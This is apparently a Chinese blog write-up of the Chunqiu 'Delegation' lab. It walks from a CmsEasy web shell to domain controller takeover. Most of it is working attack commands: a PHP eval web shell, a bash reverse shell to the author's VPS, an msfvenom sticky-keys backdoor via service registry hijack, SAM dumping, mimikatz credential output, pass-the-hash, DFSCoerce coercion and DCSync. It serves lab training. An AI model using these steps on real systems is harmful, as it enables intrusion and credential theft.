春秋云境Delegation-WP【一遍过】

最新推荐文章于 2024-01-13 19:54:20 发布
最新推荐文章于 2024-01-13 19:54:20 发布
阅读量397 收藏 1
点赞数 1
分类专栏: 渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63576152/article/details/133828891
版权

 这个靶场打了出乎意料的久。

1.外围打点总是有问题,一直不回显ok,最后靠复制大佬的命令才能正常弹shell;

2.fscan在蚁剑的shell里不显示结果(frp也不显示结果,但是是运行了的),还好可以弹shell到vps上,vps上可以正常显示结果;

3.植入木马部分,powershell修改注册表是无效的,cmd才有用;

4.各种上传的工具需要用管理员权限打开才能正常使用,SharpHound需要用猕猴桃弹出的域用户终端才能正常使用。

flag01

fscan扫描

看到是cmseasy,有个后台登录页面39.xx.xx.xx/admin,admin/123456可以登录

参考文章getshell

URL:

http://39.99.230.40/index.php?case=template&act=fetch&admin_dir=admin&site=default

Body:

sid=#data_d_.._d_.._d_.._d_11.php&slen=693&scontent=<?php @eval($_POST[1]);?>

在hackbar执行,回显ok(如果不行就赋复制这篇博客里的命令)

用蚁剑连接

如果想要转到vps上,那就再模板里添加命令

<?=system("bash -c 'bash -i >& /dev/tcp/vps/port 0>&1' ");?>

点击预览

就成功getshell了

提权

find / -perm -u=s -type f 2>/dev/null

sudo -l

使用diff得到flag01

diff --line-format=%L /dev/null /home/flag/flag01.txt

这个flag给了提示WIN19机子有一个用户名Adrian,用rockyou.txt爆破

flag02

上传fscan、frp

开启代理

./frpc -c frpc.ini

信息收集

start ping
(icmp) Target 172.22.4.7      is alive
(icmp) Target 172.22.4.19     is alive
(icmp) Target 172.22.4.36     is alive
(icmp) Target 172.22.4.45     is alive
[*] Icmp alive hosts len is: 4
172.22.4.45:80 open
172.22.4.36:22 open
172.22.4.45:139 open
172.22.4.19:139 open
172.22.4.7:139 open
172.22.4.45:135 open
172.22.4.19:135 open
172.22.4.7:135 open
172.22.4.36:21 open
172.22.4.36:3306 open
172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.7:88 open
172.22.4.36:80 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo:
[*]172.22.4.19
   [->]FILESERVER
   [->]172.22.4.19
[*] NetInfo:
[*]172.22.4.7
   [->]DC01
   [->]172.22.4.7
[*] NetBios: 172.22.4.45     XIAORANG\WIN19                 
[*] NetInfo:
[*]172.22.4.45
   [->]WIN19
   [->]172.22.4.45
[*] NetBios: 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393 
[*] 172.22.4.7  (Windows Server 2016 Datacenter 14393)
[*] NetBios: 172.22.4.7      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393 
[*] WebTitle: http://172.22.4.36        code:200 len:68100  title:中文网页标题
[*] WebTitle: http://172.22.4.45        code:200 len:703    title:IIS Windows Server

得到下面的拓扑

172.22.4.36 本机
172.22.4.19 文件服务器
172.22.4.7  DC域控
172.22.4.45 WIN19

下面先打WIN19,根据提示去爆破一下

proxychains crackmapexec smb 172.22.4.45 -u Adrian -p rockyou.txt -d WIN19

得到密码

WIN19\Adrian
babygirl1

远程连接失败

用kali远程连接一下

proxychains rdesktop 172.22.4.45

登录后会提醒重置密码

登录后在桌面上看到privesccheck,这个是一个windows的提权脚本。我们看这个high,这里说是注册表可以修改,以及可以修改的路径

我们可以通过修改注册表来写入shift后门来提权

用msf生成木马来执行我们的shift.bat脚本

msfvenom -p windows/x64/exec cmd="C:\windows\system32\cmd.exe /c C:\Users\Adrian\Desktop\shift.bat" --platform windows -f exe-service > evil.exe

然后新建shift.bat文件,内容如下:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

依次执行下面的命令

## 修改注册表
reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\evil.exe" /f
## 重启服务
sc start gupdate

锁定用户,连续按5下shift,弹出shell

创建新用户test
net user test Abcd1234 /add
将用户test添加至管理员组
net localgroup administrators test /add

远程连接172.22.4.45,获得flag

或者

msfvenom -p windows/x64/exec cmd="C:\windows\system32\cmd.exe /c C:\Users\Adrian\Desktop\sacm.bat" --platform windows -f exe-service > eviltest.exe

创建sacm.bat

reg save HKLM\SYSTEM C:\Users\Adrian\Desktop\system
reg save HKLM\SAM C:\Users\Adrian\Desktop\sam
reg save HKLM\SECURITY C:\Users\Adrian\Desktop\security

cmd运行

## 修改注册表
reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\eviltest.exe" /f
## 重启服务
sc start gupdate

生成三个文件

impacket-secretsdump LOCAL -sam sam -security security -system system

得到管理员hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:5943c35371c96f19bda7b8e67d041727

hash传递,getshell,获得flag

proxychains impacket-wmiexec -hashes 00000000000000000000000000000000:ba21c629d9fd56aff10c3e826323e6ab Administrator@172.22.4.45
type C:\users\administrator\flag\flag02.txt

flag03

远程连接test账户,上传mimikatz,获取hash(其实就是为了获取前面$MACHINE.ACC的hash)

mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit
Authentication Id : 0 ; 1258130 (00000000:00133292)
Session           : RemoteInteractive from 3
User Name         : test
Domain            : WIN19
Logon Server      : WIN19
Logon Time        : 2023/10/14 18:44:38
SID               : S-1-5-21-3980434786-725135618-2951588801-1004
        msv :
         [00000003] Primary
         * Username : test
         * Domain   : WIN19
         * NTLM     : c780c78872a102256e946b3ad238f661
         * SHA1     : bc4e7d2a003b79bb6ffdfff949108220c1fad373
        tspkg :
        wdigest :
         * Username : test
         * Domain   : WIN19
         * Password : (null)
        kerberos :
         * Username : test
         * Domain   : WIN19
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 1250304 (00000000:00131400)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/14 18:44:38
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : WIN19$
         * Domain   : XIAORANG
         * NTLM     : 5943c35371c96f19bda7b8e67d041727
         * SHA1     : 5a4dc280e89974fdec8cf1b2b76399d26f39b8f8
        tspkg :
        wdigest :
         * Username : WIN19$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN19$
         * Domain   : xiaorang.lab
         * Password : 3a 94 de 4d 87 8e 7d 46 88 ec 9c 70 fd f0 c5 3e 4c f3 ce 6a 80 79 46 c6 2f f9 52 9b 4e 1d 90 58 52 2a 4e ac bf 05 09 08 06 0c 4b a9 a2 aa a2 9d db 0d f8 09 82 c0 6e f4 1b 81 93 59 67 54 de 17 82 d7 c3 82 c5 38 13 4f d0 55 98 f6 a2 cc e7 cb 85 84 35 8a 0c 2e 9f d1 90 0c 0f c1 ea 0d d9 c5 d9 7f 29 a3 57 46 6b bf a4 b9 73 9a 80 84 1d df 3f 33 f5 16 e4 ee 2e d3 88 92 cd a5 6e ac e3 eb 71 43 ed 7c b8 a2 9e 52 d5 31 1c 50 9b c8 71 03 e1 8e 4f 60 53 84 13 19 02 e2 8d 92 3f dc 0b 38 2c 13 c1 0e 6b 64 a7 fc 7a 2a a5 0e e0 b0 66 a9 a0 2f 8d 8d 40 f8 72 d3 36 d3 3a a9 0d 3f b9 00 ef 3e 90 d9 36 a2 ad 36 2a 22 cd a0 cc 5b f4 0e a4 6b d3 24 8e 6e 99 59 96 d9 f8 a7 26 09 58 0a c2 3a 69 56 76 40 b9 10 92 a7 5c aa 3d e1 d0 1f
        ssp :
        credman :

Authentication Id : 0 ; 576523 (00000000:0008cc0b)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/14 18:41:00
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : WIN19$
         * Domain   : XIAORANG
         * NTLM     : 5943c35371c96f19bda7b8e67d041727
         * SHA1     : 5a4dc280e89974fdec8cf1b2b76399d26f39b8f8
        tspkg :
        wdigest :
         * Username : WIN19$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN19$
         * Domain   : xiaorang.lab
         * Password : 3a 94 de 4d 87 8e 7d 46 88 ec 9c 70 fd f0 c5 3e 4c f3 ce 6a 80 79 46 c6 2f f9 52 9b 4e 1d 90 58 52 2a 4e ac bf 05 09 08 06 0c 4b a9 a2 aa a2 9d db 0d f8 09 82 c0 6e f4 1b 81 93 59 67 54 de 17 82 d7 c3 82 c5 38 13 4f d0 55 98 f6 a2 cc e7 cb 85 84 35 8a 0c 2e 9f d1 90 0c 0f c1 ea 0d d9 c5 d9 7f 29 a3 57 46 6b bf a4 b9 73 9a 80 84 1d df 3f 33 f5 16 e4 ee 2e d3 88 92 cd a5 6e ac e3 eb 71 43 ed 7c b8 a2 9e 52 d5 31 1c 50 9b c8 71 03 e1 8e 4f 60 53 84 13 19 02 e2 8d 92 3f dc 0b 38 2c 13 c1 0e 6b 64 a7 fc 7a 2a a5 0e e0 b0 66 a9 a0 2f 8d 8d 40 f8 72 d3 36 d3 3a a9 0d 3f b9 00 ef 3e 90 d9 36 a2 ad 36 2a 22 cd a0 cc 5b f4 0e a4 6b d3 24 8e 6e 99 59 96 d9 f8 a7 26 09 58 0a c2 3a 69 56 76 40 b9 10 92 a7 5c aa 3d e1 d0 1f
        ssp :
        credman :

Authentication Id : 0 ; 574452 (00000000:0008c3f4)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2023/10/14 18:41:00
SID               : S-1-5-96-0-2
        msv :
         [00000003] Primary
         * Username : WIN19$
         * Domain   : XIAORANG
         * NTLM     : 5943c35371c96f19bda7b8e67d041727
         * SHA1     : 5a4dc280e89974fdec8cf1b2b76399d26f39b8f8
        tspkg :
        wdigest :
         * Username : WIN19$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN19$
         * Domain   : xiaorang.lab
         * Password : 3a 94 de 4d 87 8e 7d 46 88 ec 9c 70 fd f0 c5 3e 4c f3 ce 6a 80 79 46 c6 2f f9 52 9b 4e 1d 90 58 52 2a 4e ac bf 05 09 08 06 0c 4b a9 a2 aa a2 9d db 0d f8 09 82 c0 6e f4 1b 81 93 59 67 54 de 17 82 d7 c3 82 c5 38 13 4f d0 55 98 f6 a2 cc e7 cb 85 84 35 8a 0c 2e 9f d1 90 0c 0f c1 ea 0d d9 c5 d9 7f 29 a3 57 46 6b bf a4 b9 73 9a 80 84 1d df 3f 33 f5 16 e4 ee 2e d3 88 92 cd a5 6e ac e3 eb 71 43 ed 7c b8 a2 9e 52 d5 31 1c 50 9b c8 71 03 e1 8e 4f 60 53 84 13 19 02 e2 8d 92 3f dc 0b 38 2c 13 c1 0e 6b 64 a7 fc 7a 2a a5 0e e0 b0 66 a9 a0 2f 8d 8d 40 f8 72 d3 36 d3 3a a9 0d 3f b9 00 ef 3e 90 d9 36 a2 ad 36 2a 22 cd a0 cc 5b f4 0e a4 6b d3 24 8e 6e 99 59 96 d9 f8 a7 26 09 58 0a c2 3a 69 56 76 40 b9 10 92 a7 5c aa 3d e1 d0 1f
        ssp :
        credman :

Authentication Id : 0 ; 57246 (00000000:0000df9e)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/14 18:38:08
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : WIN19$
         * Domain   : XIAORANG
         * NTLM     : 5943c35371c96f19bda7b8e67d041727
         * SHA1     : 5a4dc280e89974fdec8cf1b2b76399d26f39b8f8
        tspkg :
        wdigest :
         * Username : WIN19$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN19$
         * Domain   : xiaorang.lab
         * Password : 3a 94 de 4d 87 8e 7d 46 88 ec 9c 70 fd f0 c5 3e 4c f3 ce 6a 80 79 46 c6 2f f9 52 9b 4e 1d 90 58 52 2a 4e ac bf 05 09 08 06 0c 4b a9 a2 aa a2 9d db 0d f8 09 82 c0 6e f4 1b 81 93 59 67 54 de 17 82 d7 c3 82 c5 38 13 4f d0 55 98 f6 a2 cc e7 cb 85 84 35 8a 0c 2e 9f d1 90 0c 0f c1 ea 0d d9 c5 d9 7f 29 a3 57 46 6b bf a4 b9 73 9a 80 84 1d df 3f 33 f5 16 e4 ee 2e d3 88 92 cd a5 6e ac e3 eb 71 43 ed 7c b8 a2 9e 52 d5 31 1c 50 9b c8 71 03 e1 8e 4f 60 53 84 13 19 02 e2 8d 92 3f dc 0b 38 2c 13 c1 0e 6b 64 a7 fc 7a 2a a5 0e e0 b0 66 a9 a0 2f 8d 8d 40 f8 72 d3 36 d3 3a a9 0d 3f b9 00 ef 3e 90 d9 36 a2 ad 36 2a 22 cd a0 cc 5b f4 0e a4 6b d3 24 8e 6e 99 59 96 d9 f8 a7 26 09 58 0a c2 3a 69 56 76 40 b9 10 92 a7 5c aa 3d e1 d0 1f
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN19$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2023/10/14 18:38:08
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : WIN19$
         * Domain   : XIAORANG
         * NTLM     : 5943c35371c96f19bda7b8e67d041727
         * SHA1     : 5a4dc280e89974fdec8cf1b2b76399d26f39b8f8
        tspkg :
        wdigest :
         * Username : WIN19$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : win19$
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 27642 (00000000:00006bfa)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2023/10/14 18:38:08
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : WIN19$
         * Domain   : XIAORANG
         * NTLM     : 5943c35371c96f19bda7b8e67d041727
         * SHA1     : 5a4dc280e89974fdec8cf1b2b76399d26f39b8f8
        tspkg :
        wdigest :
         * Username : WIN19$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN19$
         * Domain   : xiaorang.lab
         * Password : 3a 94 de 4d 87 8e 7d 46 88 ec 9c 70 fd f0 c5 3e 4c f3 ce 6a 80 79 46 c6 2f f9 52 9b 4e 1d 90 58 52 2a 4e ac bf 05 09 08 06 0c 4b a9 a2 aa a2 9d db 0d f8 09 82 c0 6e f4 1b 81 93 59 67 54 de 17 82 d7 c3 82 c5 38 13 4f d0 55 98 f6 a2 cc e7 cb 85 84 35 8a 0c 2e 9f d1 90 0c 0f c1 ea 0d d9 c5 d9 7f 29 a3 57 46 6b bf a4 b9 73 9a 80 84 1d df 3f 33 f5 16 e4 ee 2e d3 88 92 cd a5 6e ac e3 eb 71 43 ed 7c b8 a2 9e 52 d5 31 1c 50 9b c8 71 03 e1 8e 4f 60 53 84 13 19 02 e2 8d 92 3f dc 0b 38 2c 13 c1 0e 6b 64 a7 fc 7a 2a a5 0e e0 b0 66 a9 a0 2f 8d 8d 40 f8 72 d3 36 d3 3a a9 0d 3f b9 00 ef 3e 90 d9 36 a2 ad 36 2a 22 cd a0 cc 5b f4 0e a4 6b d3 24 8e 6e 99 59 96 d9 f8 a7 26 09 58 0a c2 3a 69 56 76 40 b9 10 92 a7 5c aa 3d e1 d0 1f
        ssp :
        credman :

Authentication Id : 0 ; 27612 (00000000:00006bdc)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2023/10/14 18:38:08
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : WIN19$
         * Domain   : XIAORANG
         * NTLM     : 5943c35371c96f19bda7b8e67d041727
         * SHA1     : 5a4dc280e89974fdec8cf1b2b76399d26f39b8f8
        tspkg :
        wdigest :
         * Username : WIN19$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN19$
         * Domain   : xiaorang.lab
         * Password : 3a 94 de 4d 87 8e 7d 46 88 ec 9c 70 fd f0 c5 3e 4c f3 ce 6a 80 79 46 c6 2f f9 52 9b 4e 1d 90 58 52 2a 4e ac bf 05 09 08 06 0c 4b a9 a2 aa a2 9d db 0d f8 09 82 c0 6e f4 1b 81 93 59 67 54 de 17 82 d7 c3 82 c5 38 13 4f d0 55 98 f6 a2 cc e7 cb 85 84 35 8a 0c 2e 9f d1 90 0c 0f c1 ea 0d d9 c5 d9 7f 29 a3 57 46 6b bf a4 b9 73 9a 80 84 1d df 3f 33 f5 16 e4 ee 2e d3 88 92 cd a5 6e ac e3 eb 71 43 ed 7c b8 a2 9e 52 d5 31 1c 50 9b c8 71 03 e1 8e 4f 60 53 84 13 19 02 e2 8d 92 3f dc 0b 38 2c 13 c1 0e 6b 64 a7 fc 7a 2a a5 0e e0 b0 66 a9 a0 2f 8d 8d 40 f8 72 d3 36 d3 3a a9 0d 3f b9 00 ef 3e 90 d9 36 a2 ad 36 2a 22 cd a0 cc 5b f4 0e a4 6b d3 24 8e 6e 99 59 96 d9 f8 a7 26 09 58 0a c2 3a 69 56 76 40 b9 10 92 a7 5c aa 3d e1 d0 1f
        ssp :
        credman :

Authentication Id : 0 ; 26466 (00000000:00006762)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2023/10/14 18:38:08
SID               :
        msv :
         [00000003] Primary
         * Username : WIN19$
         * Domain   : XIAORANG
         * NTLM     : 5943c35371c96f19bda7b8e67d041727
         * SHA1     : 5a4dc280e89974fdec8cf1b2b76399d26f39b8f8
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 1258099 (00000000:00133273)
Session           : RemoteInteractive from 3
User Name         : test
Domain            : WIN19
Logon Server      : WIN19
Logon Time        : 2023/10/14 18:44:38
SID               : S-1-5-21-3980434786-725135618-2951588801-1004
        msv :
         [00000003] Primary
         * Username : test
         * Domain   : WIN19
         * NTLM     : c780c78872a102256e946b3ad238f661
         * SHA1     : bc4e7d2a003b79bb6ffdfff949108220c1fad373
        tspkg :
        wdigest :
         * Username : test
         * Domain   : WIN19
         * Password : (null)
        kerberos :
         * Username : test
         * Domain   : WIN19
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 1250190 (00000000:0013138e)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/14 18:44:38
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : WIN19$
         * Domain   : XIAORANG
         * NTLM     : 5943c35371c96f19bda7b8e67d041727
         * SHA1     : 5a4dc280e89974fdec8cf1b2b76399d26f39b8f8
        tspkg :
        wdigest :
         * Username : WIN19$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN19$
         * Domain   : xiaorang.lab
         * Password : 3a 94 de 4d 87 8e 7d 46 88 ec 9c 70 fd f0 c5 3e 4c f3 ce 6a 80 79 46 c6 2f f9 52 9b 4e 1d 90 58 52 2a 4e ac bf 05 09 08 06 0c 4b a9 a2 aa a2 9d db 0d f8 09 82 c0 6e f4 1b 81 93 59 67 54 de 17 82 d7 c3 82 c5 38 13 4f d0 55 98 f6 a2 cc e7 cb 85 84 35 8a 0c 2e 9f d1 90 0c 0f c1 ea 0d d9 c5 d9 7f 29 a3 57 46 6b bf a4 b9 73 9a 80 84 1d df 3f 33 f5 16 e4 ee 2e d3 88 92 cd a5 6e ac e3 eb 71 43 ed 7c b8 a2 9e 52 d5 31 1c 50 9b c8 71 03 e1 8e 4f 60 53 84 13 19 02 e2 8d 92 3f dc 0b 38 2c 13 c1 0e 6b 64 a7 fc 7a 2a a5 0e e0 b0 66 a9 a0 2f 8d 8d 40 f8 72 d3 36 d3 3a a9 0d 3f b9 00 ef 3e 90 d9 36 a2 ad 36 2a 22 cd a0 cc 5b f4 0e a4 6b d3 24 8e 6e 99 59 96 d9 f8 a7 26 09 58 0a c2 3a 69 56 76 40 b9 10 92 a7 5c aa 3d e1 d0 1f
        ssp :
        credman :

Authentication Id : 0 ; 1247879 (00000000:00130a87)
Session           : Interactive from 3
User Name         : UMFD-3
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2023/10/14 18:44:38
SID               : S-1-5-96-0-3
        msv :
         [00000003] Primary
         * Username : WIN19$
         * Domain   : XIAORANG
         * NTLM     : 5943c35371c96f19bda7b8e67d041727
         * SHA1     : 5a4dc280e89974fdec8cf1b2b76399d26f39b8f8
        tspkg :
        wdigest :
         * Username : WIN19$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN19$
         * Domain   : xiaorang.lab
         * Password : 3a 94 de 4d 87 8e 7d 46 88 ec 9c 70 fd f0 c5 3e 4c f3 ce 6a 80 79 46 c6 2f f9 52 9b 4e 1d 90 58 52 2a 4e ac bf 05 09 08 06 0c 4b a9 a2 aa a2 9d db 0d f8 09 82 c0 6e f4 1b 81 93 59 67 54 de 17 82 d7 c3 82 c5 38 13 4f d0 55 98 f6 a2 cc e7 cb 85 84 35 8a 0c 2e 9f d1 90 0c 0f c1 ea 0d d9 c5 d9 7f 29 a3 57 46 6b bf a4 b9 73 9a 80 84 1d df 3f 33 f5 16 e4 ee 2e d3 88 92 cd a5 6e ac e3 eb 71 43 ed 7c b8 a2 9e 52 d5 31 1c 50 9b c8 71 03 e1 8e 4f 60 53 84 13 19 02 e2 8d 92 3f dc 0b 38 2c 13 c1 0e 6b 64 a7 fc 7a 2a a5 0e e0 b0 66 a9 a0 2f 8d 8d 40 f8 72 d3 36 d3 3a a9 0d 3f b9 00 ef 3e 90 d9 36 a2 ad 36 2a 22 cd a0 cc 5b f4 0e a4 6b d3 24 8e 6e 99 59 96 d9 f8 a7 26 09 58 0a c2 3a 69 56 76 40 b9 10 92 a7 5c aa 3d e1 d0 1f
        ssp :
        credman :

Authentication Id : 0 ; 644847 (00000000:0009d6ef)
Session           : RemoteInteractive from 2
User Name         : Adrian
Domain            : WIN19
Logon Server      : WIN19
Logon Time        : 2023/10/14 18:41:25
SID               : S-1-5-21-3980434786-725135618-2951588801-1003
        msv :
         [00000003] Primary
         * Username : Adrian
         * Domain   : WIN19
         * NTLM     : c780c78872a102256e946b3ad238f661
         * SHA1     : bc4e7d2a003b79bb6ffdfff949108220c1fad373
        tspkg :
        wdigest :
         * Username : Adrian
         * Domain   : WIN19
         * Password : (null)
        kerberos :
         * Username : Adrian
         * Domain   : WIN19
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 576795 (00000000:0008cd1b)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/14 18:41:00
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : WIN19$
         * Domain   : XIAORANG
         * NTLM     : 5943c35371c96f19bda7b8e67d041727
         * SHA1     : 5a4dc280e89974fdec8cf1b2b76399d26f39b8f8
        tspkg :
        wdigest :
         * Username : WIN19$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN19$
         * Domain   : xiaorang.lab
         * Password : 3a 94 de 4d 87 8e 7d 46 88 ec 9c 70 fd f0 c5 3e 4c f3 ce 6a 80 79 46 c6 2f f9 52 9b 4e 1d 90 58 52 2a 4e ac bf 05 09 08 06 0c 4b a9 a2 aa a2 9d db 0d f8 09 82 c0 6e f4 1b 81 93 59 67 54 de 17 82 d7 c3 82 c5 38 13 4f d0 55 98 f6 a2 cc e7 cb 85 84 35 8a 0c 2e 9f d1 90 0c 0f c1 ea 0d d9 c5 d9 7f 29 a3 57 46 6b bf a4 b9 73 9a 80 84 1d df 3f 33 f5 16 e4 ee 2e d3 88 92 cd a5 6e ac e3 eb 71 43 ed 7c b8 a2 9e 52 d5 31 1c 50 9b c8 71 03 e1 8e 4f 60 53 84 13 19 02 e2 8d 92 3f dc 0b 38 2c 13 c1 0e 6b 64 a7 fc 7a 2a a5 0e e0 b0 66 a9 a0 2f 8d 8d 40 f8 72 d3 36 d3 3a a9 0d 3f b9 00 ef 3e 90 d9 36 a2 ad 36 2a 22 cd a0 cc 5b f4 0e a4 6b d3 24 8e 6e 99 59 96 d9 f8 a7 26 09 58 0a c2 3a 69 56 76 40 b9 10 92 a7 5c aa 3d e1 d0 1f
        ssp :
        credman :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2023/10/14 18:38:11
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2023/10/14 18:38:08
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 57227 (00000000:0000df8b)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/14 18:38:08
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : WIN19$
         * Domain   : XIAORANG
         * NTLM     : 5943c35371c96f19bda7b8e67d041727
         * SHA1     : 5a4dc280e89974fdec8cf1b2b76399d26f39b8f8
        tspkg :
        wdigest :
         * Username : WIN19$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN19$
         * Domain   : xiaorang.lab
         * Password : 3a 94 de 4d 87 8e 7d 46 88 ec 9c 70 fd f0 c5 3e 4c f3 ce 6a 80 79 46 c6 2f f9 52 9b 4e 1d 90 58 52 2a 4e ac bf 05 09 08 06 0c 4b a9 a2 aa a2 9d db 0d f8 09 82 c0 6e f4 1b 81 93 59 67 54 de 17 82 d7 c3 82 c5 38 13 4f d0 55 98 f6 a2 cc e7 cb 85 84 35 8a 0c 2e 9f d1 90 0c 0f c1 ea 0d d9 c5 d9 7f 29 a3 57 46 6b bf a4 b9 73 9a 80 84 1d df 3f 33 f5 16 e4 ee 2e d3 88 92 cd a5 6e ac e3 eb 71 43 ed 7c b8 a2 9e 52 d5 31 1c 50 9b c8 71 03 e1 8e 4f 60 53 84 13 19 02 e2 8d 92 3f dc 0b 38 2c 13 c1 0e 6b 64 a7 fc 7a 2a a5 0e e0 b0 66 a9 a0 2f 8d 8d 40 f8 72 d3 36 d3 3a a9 0d 3f b9 00 ef 3e 90 d9 36 a2 ad 36 2a 22 cd a0 cc 5b f4 0e a4 6b d3 24 8e 6e 99 59 96 d9 f8 a7 26 09 58 0a c2 3a 69 56 76 40 b9 10 92 a7 5c aa 3d e1 d0 1f
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN19$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2023/10/14 18:38:08
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : WIN19$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : win19$
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

mimikatz(commandline) # exit
Bye!

得到WIN19$的NTLM

5943c35371c96f19bda7b8e67d041727

mimikatz来hash传递,弹出域用户的管理员终端

mimikatz
privilege::debug
sekurlsa::pth /user:WIN19$ /domain:"xiaorang.lab" /ntlm:5943c35371c96f19bda7b8e67d041727

上传SharpHound.exe查看域结构

SharpHound.exe -c all

ps:要用域用户管理员权限运行SharpHound,不然就会这样

BloodHound分析,WIN19 和 DC01 都存在非约束性委托(一般不额外设置的话,DC默认非约束性委派),那接下来就是利用非约束性委派

或者利用AdFind扫描

AdFind.exe -b "DC=XIAORANG,DC=LAB" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

上传Rubeus.exe 监听 TGT

Rubeus.exe monitor /interval:1 /filteruser:DC01$

要用管理员权限打开!!!不然会这样

通过前面获取到的机器账号 WIN19$ 的哈希来触发 DC01 回连

proxychains4 python3 dfscoerce.py -u "WIN19$" -hashes :5943c35371c96f19bda7b8e67d041727 -d xiaorang.lab win19 172.22.4.7

Rubeus 中成功接收到 DC01 的 TGT

将base64存入base64.txt中,解码后写入DC.kirbi(要把这个文件放到mimikatz.exe的目录下)

certutil -f -decode base64.txt DC.kirbi

请求dcsync

mimikatz.exe "kerberos::purge" "kerberos::ptt DC.kirbi" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"

得到域管的hash

4889f6553239ace1f7c47fa2c619c252

获得fileserver的flag

proxychains crackmapexec smb 172.22.4.19 -u administrator -H4889f6553239ace1f7c47fa2c619c252 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

flag04

获得域控的flag

proxychains crackmapexec smb 172.22.4.7 -u administrator -H4889f6553239ace1f7c47fa2c619c252 -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"

Jugg_xie
关注
专栏目录
ichunqiu云境 - Delegation Writeup
WUfagg的博客
12-10 926
一场内网渗透
